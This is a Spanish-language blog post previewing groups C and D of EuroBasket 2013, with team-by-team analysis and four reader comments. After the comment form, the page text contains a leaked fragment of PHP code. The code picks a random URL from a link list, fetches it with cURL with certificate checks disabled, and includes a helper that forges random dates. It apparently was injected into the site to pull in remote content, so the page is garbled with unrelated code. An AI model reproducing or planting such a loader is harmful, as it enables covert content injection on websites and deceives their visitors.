EuroNBAsket 2013: La previa (Grupos C y D)

03 de September de 2013 por TheDeerHunter

2ª parte de nuestra previa. Tras el repaso de los 2 primeros grupos vamos con los grupos C y D.

GRUPO C

Marc

El grupo de la bicampeona España tampoco es una bicoca. La “roja” presenta a priori la lista más vulnerable de los últimos años y con menor número de representantes NBA. A la larga podrían echar en falta a sus tradicionales referencias (Pau Gasol/Navarro) así como a importantes jugadores interiores (Ibaka, Felipe, Mirotic)

Es el momento de Marc Gasol, el mejor center de la competición de largo y aspirante a MVP. Deberá asumir el liderazgo de una vez por todas, algo que ya ha demostrado a nivel de clubes, y deberá multiplicarse teniendo en cuenta la total falta de experiencia internacional del resto de interiores seleccionados. La otra gran baza es la dirección, con un trío de lujo formado por Jose Calderón, Ricky Rubio y Sergio Rodriguez. Además, hemos visto a un Víctor Claver como nunca en la selección que podría resultar decisivo para alcanzar el oro, y no podemos olvidar a Rudy, Llull, San Emeterio y compañia. 

El peor trago de esta primera fase será el enfrentamiento contra la selección anfitriona, Eslovenia. Llegan a la cita en un estado de forma fabuloso y no debería extrañar que sean los mayores tapados de la competición. Goran Dragic, tras el mejor año de su carrera en la NBA, debe demostrar ante su gente que es uno de los grandes jugadores del momento. A su lado una batería de experimentados y talentosos jugadores FIBA: Nachbar, Lorbek, Slokar, Lakovic, Begic… y de entrenador Bozidar Maljkovic.

Un peldaño por debajo llegan dos selecciones peligrosas. Por un lado la Polonia de Marcin Gortat, con gente como Lampe y Kelati de escuderos. Por el otro Croacia, con Bojan Bogdanovic a la cabeza y viejos conocidos en España como Ante Tomic, Ukic, Dontaye Draper… No vienen de hacer una buena preparación pero siempre te pueden complicar la vida. Ojo con Dario Saric.

Lo tiene bastante complicado Georgia, con las bajas de Pachulia y Shengheila. Sin representantes NBA tienen varios jugadores de nivel Euroliga, como el nacionalizado Ricky Hickman, Shermanidi, Markoishvili y Sanikidze. El puntito entrañable lo da Tskitishvili (“Tikismikis de mi vida” que decía Andrés). Previsiblemente caerán eliminados, pero pueden hacer de juez en esta primera fase.

Por su parte diría que la República Checa será uno de los candidatos a la cuchara de madera del campeonato. Su “flamante estrella” NBA es Jan Vesely y cuentan con algunos viejos conocidos como Jiri Welsch o Lubos Barton. También serán de la partida los ACB Jelinek y Satoranski. Han funcionado fatal en la preparación y en este grupo nadie les va a regalar nada.

GRUPO D

Otro grupo bastante “perro” a priori. No hay ningún favorito claro ni un gran candidato pero cuenta con varios equipos altamente competitivos.

Aparentemente son los griegos quienes en mejores condiciones llegan. El otro día le pegaron un revolcón considerable a los mismísimos lituanos y también doblegaron a Francia. Siempre sorprende el rendimiento que le sacan a sus mimbres y no hay duda de que habrá que volverles a tener en cuenta. Sin NBAs en sus filas pero con la eterna peligrosidad de Spanoulis en este tipo de citas. Hay que añadir los “extranjeros” de las ligas española y rusa (Papanikolaou, Bourousis, Zisis y Kaimakouglou) y la vieja guardia de Olympiacos y Panathinaikos. ¿Para qué más?

Rusia, en cambio, llega en un cierto estado depresivo. Huérfanos de Kirilenko, tampoco Mozgov acude a la cita. Por si fuera poco se les lesiona Vorontsevich y no han llegado a arrancar en la preparación. No obstante, si alguien tiene potencial latente para sobreponerse y resultar competitivos a pesar de todo son ellos. Hay que ver en acción a Alexey Shved y al nuevo jugador de Cavs, Sergey Karasev, ambos asumiendo galones. Sobre el papel cuentan con físico y talento de sobra para competir, al menos en esta primera ronda.

Turquía ha cuajado una preparación irregular. Falla Kanter pero disponen de un juego interior temible con Omer Asik e Ersan Ilyasova a la cabeza. Puede ser uno de los últimos bailes de Hedo Turkoglu a estos niveles. Finalmente también contarán con Arslan, junto con otros ilustres de esta selección como Erden, Oman…

Italia lo va a tener muy difícil con tanta baja de por medio. A la ausencias de Gallinari y Bargnani, recientemente se ha unido Gigli. Tendrán en los NBA Marco Bellinelli y Luigi Datome, junto con el asimilado Travis Diener, sus principales armas pero es difícil que les sirva para superar el papel decepcionante de las anteriores citas.

Por último tenemos dos selecciones de segunda fila. Suecia cuenta con Jonas Jerebko y Jeffery Taylor como representantes NBA pero el resto del equipo es demasiado débil como para tenerles en cuenta. Finlandia sorprendió en el campeonato de Lituania, pero en este grupo Petteri Koponen y los suyos lo van a tener casi imposible.

Comenta

4 comentarios a esta entrada

  1. jhc dice:
    #1

    España va tener unas cuantas puedras de toque en esta primera fase, pero deberia asegurarse el 1º puesto y un cruce favorable en siguiente ronda

      Citar

  2. nba dice:
    #2

    todo dependera de si Marc no se carga muy pronto de faltas en los partidos

      Citar

  3. Nacho dice:
    #3

    He visto poco a España en la preparación, pero me sorprendió y mucho contra Francia allí. Jugó un final de partido serio serio. Sin ruido, pero implacable. Sigue siendo el rival a batir. El juego interior sin Marc es una incógnita, pero si sabe aprovechar (y parece que lo hace) el juego del doble base va a ser muy difícil de defender.

      Citar

  4. rumbero dice:
    #4

    Turquia palmando contra Finlandia con gente NBA por ahí y haciendo un ridículo espantoso en la primera parte. Que caretos de Tanjevic

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>